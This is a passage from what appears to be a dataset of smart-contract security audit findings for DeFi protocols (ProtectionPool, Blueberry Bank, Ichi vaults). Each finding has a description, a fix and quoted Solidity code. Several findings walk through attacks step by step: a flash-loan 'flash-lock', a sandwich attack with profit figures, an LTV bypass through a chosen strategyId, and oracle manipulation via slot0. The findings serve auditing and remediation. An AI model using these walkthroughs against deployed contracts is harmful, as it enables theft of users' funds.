ratio is above the floor, then protection cannot be purchased.\\nHowever, we see that the minimum premium is also used if _totalCapital is below _minRequiredCapital. In this case, protection should be very expensive, but it will instead be very cheap.чIssue If unlocked capital in pool falls below minRequiredCapital, then protection can be bought for minimum premium\\nProhibit protection purchases when capital falls below the minimum required capitalчBuyers can get very cheap protection at a time when it should be expensive.ч```\\n if (\\n RiskFactorCalculator.canCalculateRiskFactor(\\n _totalCapital,\\n _leverageRatio,\\n _poolParameters.leverageRatioFloor,\\n _poolParameters.leverageRatioCeiling,\\n _poolParameters.minRequiredCapital\\n )\\n ) {\\n // rest of code\\n } else {\\n /// This means that the risk factor cannot be calculated because of either\\n /// min capital not met or leverage ratio out of range.\\n /// Hence, the premium is the minimum premium\\n _isMinPremium = true;\\n }\\n```\\n -secondary markets are problematic with how `lockCapital` worksчmediumчSeeing that a pool is about to lock, an attacker can use a flash loan from a secondary market like uniswap to claim the share of a potential unlock of capital later.\\nThe timestamp a pool switches to `Late` can be predicted and an attacker can use this to call `assessState` which is callable by anyone. This will trigger the pool to move from Active/LateWithinGracePeriod to `Late` calling `lockCapital` on the ProtectionPool:\\n```\\nFile: ProtectionPool.sol\\n\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n```\\n\\nThis records who is holding sTokens at this point in time. If the borrower makes a payment and the pool turns back to Active, later the locked funds will be available to claim for the sToken holders at that snapshot:\\n```\\nFile: DefaultStateManager.sol\\n\\n /// The claimable amount for the given seller is proportional to the seller's share of the total supply at the snapshot\\n /// claimable amount = (seller's snapshot balance / total supply at snapshot) * locked capital amount\\n _claimableUnlockedCapital =\\n (_poolSToken.balanceOfAt(_seller, _snapshotId) *\\n lockedCapital.amount) /\\n _poolSToken.totalSupplyAt(_snapshotId);\\n```\\n\\nFrom docs:\\nIf sellers wish to redeem their capital and interest before the lockup period, they might be able to find a buyer of their sToken in a secondary market like Uniswap. Traders in the exchanges can long/short sTokens based on their opinion about the risk exposure associated with sTokens. Since an sToken is a fungible ERC20 token, it is fairly easy to bootstrap the secondary markets for protection sellers.\\nIf there is a uniswap (or similar) pool for this sToken, an attacker could potentially, using a flash loan, trigger the switch to `Late` and since they will be the ones holding the sTokens at the point of locking they will be the ones that can claim the funds at a potential unlock.чI recommend you make `assessState` only callable by a trusted user. This would remove the attack vector, since you must hold the tokens over a transaction. It would still be possible to use the withdraw bug, but if that is fixed this would remove the possibility to \"flash-lock\".чAn attacker can, using a flash loan from a secondary market like uniswap, steal a LPs possible share of unlocked tokens. Only paying taking the risk of the flash loan fee.ч```\\nFile: ProtectionPool.sol\\n\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n```\\n -Sandwich attack to accruePremiumAndExpireProtections()чhighчLet's show how a malicious user, Bob, can launch a sandwich attack to `accruePremiumAndExpireProtections()` and profit.\\nSuppose there are 1,000,000 underlying tokens for the `ProtectionPool`, and `totalSupply = 1,000,000`, therefore the exchange rate is 1/1 share. Suppose Bob has 100,000 shares.\\nSuppose `accruePremiumAndExpireProtections()` is going to be called and add 100,000 to `totalSTokenUnderlying` at L346.\\nBob front-runs `accruePremiumAndExpireProtections()` and calls `deposit()` to deposit 100,000 underlying tokens into the contract. The check for `ProtectionPoolPhase` will pass for an open phase. As a result, there are 1,100,000 underlying tokens, and 1,100,000 shares, the exchange rate is still 1/1 share. Bob now has 200,000 shares.\\n```\\n function deposit(uint256 _underlyingAmount, address _receiver)\\n external\\n override\\n whenNotPaused\\n nonReentrant\\n {\\n _deposit(_underlyingAmount, _receiver);\\n }\\n\\n function _deposit(uint256 _underlyingAmount, address _receiver) internal {\\n /// Verify that the pool is not in OpenToBuyers phase\\n if (poolInfo.currentPhase == ProtectionPoolPhase.OpenToBuyers) {\\n revert ProtectionPoolInOpenToBuyersPhase();\\n }\\n\\n uint256 _sTokenShares = convertToSToken(_underlyingAmount);\\n totalSTokenUnderlying += _underlyingAmount;\\n _safeMint(_receiver, _sTokenShares);\\n poolInfo.underlyingToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _underlyingAmount\\n );\\n\\n /// Verify leverage ratio only when total capital/sTokenUnderlying is higher than minimum capital requirement\\n if (_hasMinRequiredCapital()) {\\n /// calculate pool's current leverage ratio considering the new deposit\\n uint256 _leverageRatio = calculateLeverageRatio();\\n\\n if (_leverageRatio > poolInfo.params.leverageRatioCeiling) {\\n revert ProtectionPoolLeverageRatioTooHigh(_leverageRatio);\\n }\\n }\\n\\n emit ProtectionSold(_receiver, _underlyingAmount);\\n }\\n```\\n\\nNow accruePremiumAndExpireProtections()gets called and 100,000 is added to `totalSTokenUnderlying` at L346. As a result, we have 1,200,000 underlying tokens with 1,100,000 shares. The exchange rate becomes 12/11 share.\\nBob calls the `withdraw()` function (assume he made a request two cycles back, he could do that since he had 100,000 underlying tokens in the pool) to withdraw 100,000 shares and he will get `100,000*12/11 = 109,090` underlying tokens. So he has a profit of 9,090 underlying tokens by the sandwich attack.чCreate a new contract as a temporary place to store the accrued premium, and then deliver it to the `ProtectionPool` over a period of time (delivery period) with some `premiumPerSecond` to lower the incentive of a quick profit by sandwich attack.\\nRestrict the maximum deposit amount for each cycle.\\nRestrict the maximum withdraw amount for each cycle.чA malicious user can launch a sandwich attack to accruePremiumAndExpireProtections()and profit.ч```\\n function deposit(uint256 _underlyingAmount, address _receiver)\\n external\\n override\\n whenNotPaused\\n nonReentrant\\n {\\n _deposit(_underlyingAmount, _receiver);\\n }\\n\\n function _deposit(uint256 _underlyingAmount, address _receiver) internal {\\n /// Verify that the pool is not in OpenToBuyers phase\\n if (poolInfo.currentPhase == ProtectionPoolPhase.OpenToBuyers) {\\n revert ProtectionPoolInOpenToBuyersPhase();\\n }\\n\\n uint256 _sTokenShares = convertToSToken(_underlyingAmount);\\n totalSTokenUnderlying += _underlyingAmount;\\n _safeMint(_receiver, _sTokenShares);\\n poolInfo.underlyingToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _underlyingAmount\\n );\\n\\n /// Verify leverage ratio only when total capital/sTokenUnderlying is higher than minimum capital requirement\\n if (_hasMinRequiredCapital()) {\\n /// calculate pool's current leverage ratio considering the new deposit\\n uint256 _leverageRatio = calculateLeverageRatio();\\n\\n if (_leverageRatio > poolInfo.params.leverageRatioCeiling) {\\n revert ProtectionPoolLeverageRatioTooHigh(_leverageRatio);\\n }\\n }\\n\\n emit ProtectionSold(_receiver, _underlyingAmount);\\n }\\n```\\n -Users who deposit extra funds into their Ichi farming positions will lose all their ICHI rewardsчhighчWhen a user deposits extra funds into their Ichi farming position using `openPositionFarm()`, the old farming position will be closed down and a new one will be opened. Part of this process is that their ICHI rewards will be sent to the `IchiVaultSpell.sol` contract, but they will not be distributed. They will sit in the contract until the next user (or MEV bot) calls `closePositionFarm()`, at which point they will be stolen by that user.\\nWhen Ichi farming positions are opened via the `IchiVaultSpell.sol` contract, `openPositionFarm()` is called. It goes through the usual deposit function, but rather than staking the LP tokens directly, it calls `wIchiFarm.mint()`. This function deposits the token into the `ichiFarm`, encodes the deposit as an ERC1155, and sends that token back to the Spell:\\n```\\nfunction mint(uint256 pid, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n ichiFarm.deposit(pid, amount, address(this));\\n // @ok if accIchiPerShare is always changing, so how does this work?\\n // it's basically just saving the accIchiPerShare at staking time, so when you unstake, it can calculate the difference\\n // really fucking smart actually\\n (uint256 ichiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 id = encodeId(pid, ichiPerShare);\\n _mint(msg.sender, id, amount, \"\");\\n return id;\\n}\\n```\\n\\nThe resulting ERC1155 is posted as collateral in the Blueberry Bank.\\nIf the user decides to add more funds to this position, they simply call `openPositionFarm()` again. The function has logic to check if there is already existing collateral of this LP token in the Blueberry Bank. If there is, it removes the collateral and calls `wIchiFarm.burn()` (which harvests the Ichi rewards and withdraws the LP tokens) before repeating the deposit process.\\n```\\nfunction burn(uint256 id, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n if (amount == type(uint256).max) {\\n amount = balanceOf(msg.sender, id);\\n }\\n (uint256 pid, uint256 stIchiPerShare) = decodeId(id);\\n _burn(msg.sender, id, amount);\\n\\n uint256 ichiRewards = ichiFarm.pendingIchi(pid, address(this));\\n ichiFarm.harvest(pid, address(this));\\n ichiFarm.withdraw(pid, amount, address(this));\\n\\n // Convert Legacy ICHI to ICHI v2\\n if (ichiRewards > 0) {\\n ICHIv1.safeApprove(address(ICHI), ichiRewards);\\n ICHI.convertToV2(ichiRewards);\\n }\\n\\n // Transfer LP Tokens\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransfer(msg.sender, amount);\\n\\n // Transfer Reward Tokens\\n (uint256 enIchiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 stIchi = (stIchiPerShare * amount).divCeil(1e18);\\n uint256 enIchi = (enIchiPerShare * amount) / 1e18;\\n\\n if (enIchi > stIchi) {\\n ICHI.safeTransfer(msg.sender, enIchi - stIchi);\\n }\\n return pid;\\n}\\n```\\n\\nHowever, this deposit process has no logic for distributing the ICHI rewards. Therefore, these rewards will remain sitting in the `IchiVaultSpell.sol` contract and will not reach the user.\\nFor an example of how this is handled properly, we can look at the opposite function, `closePositionFarm()`. In this case, the same `wIchiFarm.burn()` function is called. But in this case, it's followed up with an explicit call to withdraw the ICHI from the contract to the user.\\n```\\ndoRefund(ICHI);\\n```\\n\\nThis `doRefund()` function refunds the contract's full balance of ICHI to the `msg.sender`, so the result is that the next user to call `closePositionFarm()` will steal the ICHI tokens from the original user who added to their farming position.чIssue Users who deposit extra funds into their Ichi farming positions will lose all their ICHI rewards\\nIn the `openPositionFarm()` function, in the section that deals with withdrawing existing collateral, add a line that claims the ICHI rewards for the calling user.\\n```\\nif (collSize > 0) {\\n (uint256 decodedPid, ) = wIchiFarm.decodeId(collId);\\n if (farmingPid != decodedPid) revert INCORRECT_PID(farmingPid);\\n if (posCollToken != address(wIchiFarm))\\n revert INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wIchiFarm.burn(collId, collSize);\\n// Add the line below\\n doRefund(ICHI);\\n}\\n```\\nчUsers who farm their Ichi LP tokens for ICHI rewards can permanently lose their rewards.ч```\\nfunction mint(uint256 pid, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n ichiFarm.deposit(pid, amount, address(this));\\n // @ok if accIchiPerShare is always changing, so how does this work?\\n // it's basically just saving the accIchiPerShare at staking time, so when you unstake, it can calculate the difference\\n // really fucking smart actually\\n (uint256 ichiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 id = encodeId(pid, ichiPerShare);\\n _mint(msg.sender, id, amount, \"\");\\n return id;\\n}\\n```\\n -LP tokens are not sent back to withdrawing userчhighчWhen users withdraw their assets from `IchiVaultSpell.sol`, the function unwinds their position and sends them back their assets, but it never sends them back the amount they requested to withdraw, leaving the tokens stuck in the Spell contract.\\nWhen a user withdraws from `IchiVaultSpell.sol`, they either call `closePosition()` or `closePositionFarm()`, both of which make an internal call to `withdrawInternal()`.\\nThe following arguments are passed to the function:\\nstrategyId: an index into the `strategies` array, which specifies the Ichi vault in question\\ncollToken: the underlying token, which is withdrawn from Compound\\namountShareWithdraw: the number of underlying tokens to withdraw from Compound\\nborrowToken: the token that was borrowed from Compound to create the position, one of the underlying tokens of the vault\\namountRepay: the amount of the borrow token to repay to Compound\\namountLpWithdraw: the amount of the LP token to withdraw, rather than trade back into borrow tokens\\nIn order to accomplish these goals, the contract does the following...\\nRemoves the LP tokens from the ERC1155 holding them for collateral.\\n```\\ndoTakeCollateral(strategies[strategyId].vault, lpTakeAmt);\\n```\\n\\nCalculates the number of LP tokens to withdraw from the vault.\\n```\\nuint256 amtLPToRemove = vault.balanceOf(address(this)) - amountLpWithdraw;\\nvault.withdraw(amtLPToRemove, address(this));\\n```\\n\\nConverts the non-borrowed token that was withdrawn in the borrowed token (not copying the code in, as it's not relevant to this issue).\\nWithdraw the underlying token from Compound.\\n```\\ndoWithdraw(collToken, amountShareWithdraw);\\n```\\n\\nPay back the borrowed token to Compound.\\n```\\ndoRepay(borrowToken, amountRepay);\\n```\\n\\nValidate that this situation does not put us above the maxLTV for our loans.\\n```\\n_validateMaxLTV(strategyId);\\n```\\n\\nSends the remaining borrow token that weren't paid back and withdrawn underlying tokens to the user.\\n```\\ndoRefund(borrowToken);\\ndoRefund(collToken);\\n```\\n\\nCrucially, the step of sending the remaining LP tokens to the user is skipped, even though the function specifically does the calculations to ensure that `amountLpWithdraw` is held back from being taken out of the vault.чAdd an additional line to the `withdrawInternal()` function to refund all LP tokens as well:\\n```\\n doRefund(borrowToken);\\n doRefund(collToken);\\n// Add the line below\\n doRefund(address(vault));\\n```\\nчUsers who close their positions and choose to keep LP tokens (rather than unwinding the position for the constituent tokens) will have their LP tokens stuck permanently in the IchiVaultSpell contract.ч```\\ndoTakeCollateral(strategies[strategyId].vault, lpTakeAmt);\\n```\\n -Users can get around MaxLTV because of lack of strategyId validationчhighчWhen a user withdraws some of their underlying token, there is a check to ensure they still meet the Max LTV requirements. However, they are able to arbitrarily enter any `strategyId` that they would like for this check, which could allow them to exceed the LTV for their real strategy while passing the approval.\\nWhen a user calls `IchiVaultSpell.sol#reducePosition()`, it removes some of their underlying token from the vault, increasing the LTV of any loans they have taken.\\nAs a result, the `_validateMaxLTV(strategyId)` function is called to ensure they remain compliant with their strategy's specified LTV:\\n```\\nfunction _validateMaxLTV(uint256 strategyId) internal view {\\n uint256 debtValue = bank.getDebtValue(bank.POSITION_ID());\\n (, address collToken, uint256 collAmount, , , , , ) = bank\\n .getCurrentPositionInfo();\\n uint256 collPrice = bank.oracle().getPrice(collToken);\\n uint256 collValue = (collPrice * collAmount) /\\n 10**IERC20Metadata(collToken).decimals();\\n\\n if (\\n debtValue >\\n (collValue * maxLTV[strategyId][collToken]) / DENOMINATOR\\n ) revert EXCEED_MAX_LTV();\\n}\\n```\\n\\nTo summarize, this check:\\nPulls the position's total debt value\\nPulls the position's total value of underlying tokens\\nPulls the specified maxLTV for this strategyId and underlying token combination\\nEnsures that `underlyingTokenValue * maxLTV > debtValue`\\nBut there is no check to ensure that this `strategyId` value corresponds to the strategy the user is actually invested in, as we can see the `reducePosition()` function:\\n```\\nfunction reducePosition(\\n uint256 strategyId,\\n address collToken,\\n uint256 collAmount\\n) external {\\n doWithdraw(collToken, collAmount);\\n doRefund(collToken);\\n _validateMaxLTV(strategyId);\\n}\\n```\\n\\nHere is a quick proof of concept to explain the risk:\\nLet's say a user deposits 1000 DAI as their underlying collateral.\\nThey are using a risky strategy (let's call it strategy 911) which requires a maxLTV of 2X (ie maxLTV[911][DAI] = 2e5)\\nThere is another safer strategy (let's call it strategy 411) which has a maxLTV of 5X (ie maxLTV[411][DAI] = 4e5)\\nThe user takes the max loan from the risky strategy, borrowing $2000 USD of value.\\nThey are not allowed to take any more loans from that strategy, or remove any of their collateral.\\nThen, they call `reducePosition()`, withdrawing 1600 DAI and entering `411` as the strategyId.\\nThe `_validateMaxLTV` check will happen on `strategyId = 411`, and will pass, but the result will be that the user now has only 400 DAI of underlying collateral protecting $2000 USD worth of the risky strategy, violating the LTV.чIssue Users can get around MaxLTV because of lack of strategyId validation\\nSince the collateral a position holds will always be the vault token of the strategy they have used, you can validate the `strategyId` against the user's collateral, as follows:\\n```\\naddress positionCollToken = bank.positions(bank.POSITION_ID()).collToken;\\naddress positionCollId = bank.positions(bank.POSITION_ID()).collId;\\naddress unwrappedCollToken = IERC20Wrapper(positionCollToken).getUnderlyingToken(positionCollId);\\nrequire(strategies[strategyId].vault == unwrappedCollToken, \"wrong strategy\");\\n```\\nчUsers can get around the specific LTVs and create significantly higher leverage bets than the protocol has allowed. This could cause the protocol to get underwater, as the high leverage combined with risky assets could lead to dramatic price swings without adequate time for the liquidation mechanism to successfully protect solvency.ч```\\nfunction _validateMaxLTV(uint256 strategyId) internal view {\\n uint256 debtValue = bank.getDebtValue(bank.POSITION_ID());\\n (, address collToken, uint256 collAmount, , , , , ) = bank\\n .getCurrentPositionInfo();\\n uint256 collPrice = bank.oracle().getPrice(collToken);\\n uint256 collValue = (collPrice * collAmount) /\\n 10**IERC20Metadata(collToken).decimals();\\n\\n if (\\n debtValue >\\n (collValue * maxLTV[strategyId][collToken]) / DENOMINATOR\\n ) revert EXCEED_MAX_LTV();\\n}\\n```\\n -Users can be liquidated prematurely because calculation understates value of underlying positionчhighчWhen the value of the underlying asset is calculated in `getPositionRisk()`, it uses the `underlyingAmount`, which is the amount of tokens initially deposited, without any adjustment for the interest earned. This can result in users being liquidated early, because the system undervalues their assets.\\nA position is considered liquidatable if it meets the following criteria:\\n```\\n((borrowsValue - collateralValue) / underlyingValue) >= underlyingLiqThreshold\\n```\\n\\nThe value of the underlying tokens is a major factor in this calculation. However, the calculation of the underlying value is performed with the following function call:\\n```\\nuint256 cv = oracle.getUnderlyingValue(\\n pos.underlyingToken,\\n pos.underlyingAmount\\n);\\n```\\n\\nIf we trace it back, we can see that `pos.underlyingAmount` is set when `lend()` is called (ie when underlying assets are deposited). This is the only place in the code where this value is moved upward, and it is only increased by the amount deposited. It is never moved up to account for the interest payments made on the deposit, which can materially change the value.чValue of the underlying assets should be derived from the vault shares and value, rather than being stored directly.чUsers can be liquidated prematurely because the value of their underlying assets are calculated incorrectly.ч```\\n((borrowsValue - collateralValue) / underlyingValue) >= underlyingLiqThreshold\\n```\\n -Interest component of underlying amount is not withdrawable using the `withdrawLend` function. Such amount is permanently locked in the BlueBerryBank contractчhighчSoft vault shares are issued against interest bearing tokens issued by `Compound` protocol in exchange for underlying deposits. However, `withdrawLend` function caps the withdrawable amount to initial underlying deposited by user (pos.underlyingAmount). Capping underlying amount to initial underlying deposited would mean that a user can burn all his vault shares in `withdrawLend` function and only receive original underlying deposited.\\nInterest accrued component received from Soft vault (that rightfully belongs to the user) is no longer retrievable because the underlying vault shares are already burnt. Loss to the users is permanent as such interest amount sits permanently locked in Blueberry bank.\\n`withdrawLend` function in `BlueBerryBank` allows users to withdraw underlying amount from `Hard` or `Soft` vaults. `Soft` vault shares are backed by interest bearing `cTokens` issued by Compound Protocol\\nUser can request underlying by specifying `shareAmount`. When user tries to send the maximum `shareAmount` to withdraw all the lent amount, notice that the amount withdrawable is limited to the `pos.underlyingAmount` (original deposit made by the user).\\nWhile this is the case, notice also that the full `shareAmount` is deducted from `underlyingVaultShare`. User cannot recover remaining funds because in the next call, user doesn't have any vault shares against his address. Interest accrued component on the underlying that was returned by `SoftVault` to `BlueberryBank` never makes it back to the original lender.\\n```\\n wAmount = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n pos.underlyingAmount -= wAmount;\\n bank.totalLend -= wAmount;\\n```\\nчIntroduced a new variable to adjust positions & removed cap on withdraw amount.\\nHighlighted changes I recommend to withdrawLend with //******//.\\n```\\nfunction withdrawLend(address token, uint256 shareAmount)\\n external\\n override\\n inExec\\n poke(token)\\n {\\n Position storage pos = positions[POSITION_ID];\\n Bank storage bank = banks[token];\\n if (token != pos.underlyingToken) revert INVALID_UTOKEN(token);\\n \\n //*********-audit cap shareAmount to maximum value, pos.underlyingVaultShare*******\\n if (shareAmount > pos.underlyingVaultShare) {\\n shareAmount = pos.underlyingVaultShare;\\n }\\n\\n // if (shareAmount == type(uint256).max) {\\n // shareAmount = pos.underlyingVaultShare;\\n // } \\n\\n uint256 wAmount;\\n uint256 amountToOffset; //*********- audit added this to adjust position********\\n if (address(ISoftVault(bank.softVault).uToken()) == token) {\\n ISoftVault(bank.softVault).approve(\\n bank.softVault,\\n type(uint256).max\\n );\\n wAmount = ISoftVault(bank.softVault).withdraw(shareAmount);\\n } else {\\n wAmount = IHardVault(bank.hardVault).withdraw(token, shareAmount);\\n }\\n\\n //*********- audit calculate amountToOffset********\\n //*********-audit not capping wAmount anymore*******\\n amountToOffset = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n //*********-audit subtract amountToOffset instead of wAmount*******\\n pos.underlyingAmount -= amountToOffset;\\n bank.totalLend -= amountToOffset;\\n\\n wAmount = doCutWithdrawFee(token, wAmount);\\n\\n IERC20Upgradeable(token).safeTransfer(msg.sender, wAmount);\\n }\\n```\\nчEvery time, user withdraws underlying from a Soft vault, interest component gets trapped in BlueBerry contract. Here is a scenario.\\nAlice deposits 1000 USDC into `SoftVault` using the `lend` function of BlueberryBank at T=0\\nUSDC soft vault mints 1000 shares to Blueberry bank\\nUSDC soft vault deposits 1000 USDC into Compound & receives 1000 cUSDC\\nAlice at T=60 days requests withdrawal against 1000 Soft vault shares\\nSoft Vault burns 1000 soft vault shares and requests withdrawal from Compound against 1000 cTokens\\nSoft vault receives 1050 USDC (50 USDC interest) and sends this to BlueberryBank\\nBlueberry Bank caps the withdrawal amount to 1000 (original deposit)\\nBlueberry Bank deducts 0.5% withdrawal fees and deposits 995 USDC back to user\\nIn the whole process, Alice has lost access to 50 USDC.ч```\\n wAmount = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n pos.underlyingAmount -= wAmount;\\n bank.totalLend -= wAmount;\\n```\\n -BlueBerryBank#withdrawLend will cause underlying token accounting error if soft/hard vault has withdraw feeчhighчSoft/hard vaults can have a withdraw fee. This takes a certain percentage from the user when they withdraw. The way that the token accounting works in BlueBerryBank#withdrawLend, it will only remove the amount returned by the hard/soft vault from pos.underlying amount. If there is a withdraw fee, underlying amount will not be decrease properly and the user will be left with phantom collateral that they can still use.\\n```\\n // Cut withdraw fee if it is in withdrawVaultFee Window (2 months)\\n if (\\n block.timestamp <\\n config.withdrawVaultFeeWindowStartTime() +\\n config.withdrawVaultFeeWindow()\\n ) {\\n uint256 fee = (withdrawAmount * config.withdrawVaultFee()) /\\n DENOMINATOR;\\n uToken.safeTransfer(config.treasury(), fee);\\n withdrawAmount -= fee;\\n }\\n```\\n\\nBoth SoftVault and HardVault implement a withdraw fee. Here we see that withdrawAmount (the return value) is decreased by the fee amount.\\n```\\n uint256 wAmount;\\n if (address(ISoftVault(bank.softVault).uToken()) == token) {\\n ISoftVault(bank.softVault).approve(\\n bank.softVault,\\n type(uint256).max\\n );\\n wAmount = ISoftVault(bank.softVault).withdraw(shareAmount);\\n } else {\\n wAmount = IHardVault(bank.hardVault).withdraw(token, shareAmount);\\n }\\n\\n wAmount = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n pos.underlyingAmount -= wAmount;\\n bank.totalLend -= wAmount;\\n```\\n\\nThe return value is stored as `wAmount` which is then subtracted from `pos.underlyingAmount` the issue is that the withdraw fee has now caused a token accounting error for `pos`. We see that the fee paid to the hard/soft vault is NOT properly removed from `pos.underlyingAmount`. This leaves the user with phantom underlying which doesn't actually exist but that the user can use to take out loans.\\nExmaple: For simplicity let's say that 1 share = 1 underlying and the soft/hard vault has a fee of 5%. Imagine a user deposits 100 underlying to receive 100 shares. Now the user withdraws their 100 shares while the hard/soft vault has a withdraw. This burns 100 shares and softVault/hardVault.withdraw returns 95 (100 - 5). During the token accounting pos.underlyingVaultShares are decreased to 0 but pos.underlyingAmount is still equal to 5 (100 - 95).\\n```\\n uint256 cv = oracle.getUnderlyingValue(\\n pos.underlyingToken,\\n pos.underlyingAmount\\n );\\n```\\n\\nThis accounting error is highly problematic because collateralValue uses pos.underlyingAmount to determine the value of collateral for liquidation purposes. This allows the user to take on more debt than they should.ч`HardVault/SoftVault#withdraw` should also return the fee paid to the vault, so that it can be accounted for.чUser is left with collateral that isn't real but that can be used to take out a loanч```\\n // Cut withdraw fee if it is in withdrawVaultFee Window (2 months)\\n if (\\n block.timestamp <\\n config.withdrawVaultFeeWindowStartTime() +\\n config.withdrawVaultFeeWindow()\\n ) {\\n uint256 fee = (withdrawAmount * config.withdrawVaultFee()) /\\n DENOMINATOR;\\n uToken.safeTransfer(config.treasury(), fee);\\n withdrawAmount -= fee;\\n }\\n```\\n -IchiLpOracle is extemely easy to manipulate due to how IchiVault calculates underlying token balancesчhighч`IchiVault#getTotalAmounts` uses the `UniV3Pool.slot0` to determine the number of tokens it has in it's position. `slot0` is the most recent data point and is therefore extremely easy to manipulate. Given that the protocol specializes in leverage, the effects of this manipulation would compound to make malicious uses even easier.\\nICHIVault.sol\\n```\\nfunction _amountsForLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity\\n) internal view returns (uint256, uint256) {\\n (uint160 sqrtRatioX96, , , , , , ) = IUniswapV3Pool(pool).slot0();\\n return\\n UV3Math.getAmountsForLiquidity(\\n sqrtRatioX96,\\n UV3Math.getSqrtRatioAtTick(tickLower),\\n UV3Math.getSqrtRatioAtTick(tickUpper),\\n liquidity\\n );\\n}\\n```\\n\\n`IchiVault#getTotalAmounts` uses the `UniV3Pool.slot0` to determine the number of tokens it has in it's position. slot0 is the most recent data point and can easily be manipulated.\\n`IchiLPOracle` directly uses the token values returned by `vault#getTotalAmounts`. This allows a malicious user to manipulate the valuation of the LP. An example of this kind of manipulation would be to use large buys/sells to alter the composition of the LP to make it worth less or more.чToken balances should be calculated inside the oracle instead of getting them from the `IchiVault`. To determine the liquidity, use a TWAP instead of `slot0`.чIchi LP value can be manipulated to cause loss of funds for the protocol and other usersч```\\nfunction _amountsForLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity\\n) internal view returns (uint256, uint256) {\\n (uint160 sqrtRatioX96, , , , , , ) = IUniswapV3Pool(pool).slot0();\\n return\\n UV3Math.getAmountsForLiquidity(\\n sqrtRatioX96,\\n UV3Math.getSqrtRatioAtTick(tickLower),\\n UV3Math.getSqrtRatioAtTick(tickUpper),\\n liquidity\\n );\\n}\\n```\\n -IchiLpOracle returns inflated price due to invalid calculationчmediumч`IchiLpOracle` returns inflated price due to invalid calculation\\nIf you run the tests, then you can see that IchiLpOracle returns inflated price for the ICHI_USDC vault\\n```\\nSTATICCALL IchiLpOracle.getPrice(token=0xFCFE742e19790Dd67a627875ef8b45F17DB1DaC6) => (1101189125194558706411110851447)\\n```\\n\\nAs the documentation says, the token price should be in USD with 18 decimals of precision. The price returned here is `1101189125194_558706411110851447` This is 1.1 trillion USD when considering the 18 decimals.\\nThe test uses real values except for mocking ichi and usdc price, which are returned by the mock with correct decimals (1e18 and 1e6)чIssue IchiLpOracle returns inflated price due to invalid calculation\\nFix the LP token price calculation. The problem is that you multiply totalReserve with extra 1e18 (return (totalReserve * 1e18) / totalSupply;).ч`IchiLpOracle` price is used in `_validateMaxLTV` (collToken is the vault). Therefore the collateral value is inflated and users can open bigger positions than their collateral would normally allow.ч```\\nSTATICCALL IchiLpOracle.getPrice(token=0xFCFE742e19790Dd67a627875ef8b45F17DB1DaC6) => (1101189125194558706411110851447)\\n```\\n -totalLend isn't updated on liquidation, leading to permanently inflated valueчmediumч`bank.totalLend` tracks the total amount that has been lent of a given token, but it does not account for tokens that are withdrawn when a position is liquidated. As a result, the value will become overstated, leading to inaccurate data on the pool.\\nWhen a user lends a token to the Compound fork, the bank for that token increases its `totalLend` parameter:\\n```\\nbank.totalLend += amount;\\n```\\n\\nSimilarly, this value is decreased when the amount is withdrawn.\\nIn the event that a position is liquidated, the `underlyingAmount` and `underlyingVaultShare` for the user are decreased based on the amount that will be transferred to the liquidator.\\n```\\nuint256 liqSize = (pos.collateralSize * share) / oldShare;\\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\\n\\npos.collateralSize -= liqSize;\\npos.underlyingAmount -= uTokenSize;\\npos.underlyingVaultShare -= uVaultShare;\\n```\\n\\nHowever, the liquidator doesn't receive those shares \"inside the system\". Instead, they receive the softVault tokens that can be claimed directly for the underlying asset by calling `withdraw()`, which simply redeems the underlying tokens from the Compound fork and sends them to the user.\\n```\\nfunction withdraw(uint256 shareAmount)\\n external\\n override\\n nonReentrant\\n returns (uint256 withdrawAmount)\\n{\\n if (shareAmount == 0) revert ZERO_AMOUNT();\\n\\n _burn(msg.sender, shareAmount);\\n\\n uint256 uBalanceBefore = uToken.balanceOf(address(this));\\n if (cToken.redeem(shareAmount) != 0) revert REDEEM_FAILED(shareAmount);\\n uint256 uBalanceAfter = uToken.balanceOf(address(this));\\n\\n withdrawAmount = uBalanceAfter - uBalanceBefore;\\n // Cut withdraw fee if it is in withdrawVaultFee Window (2 months)\\n if (\\n block.timestamp 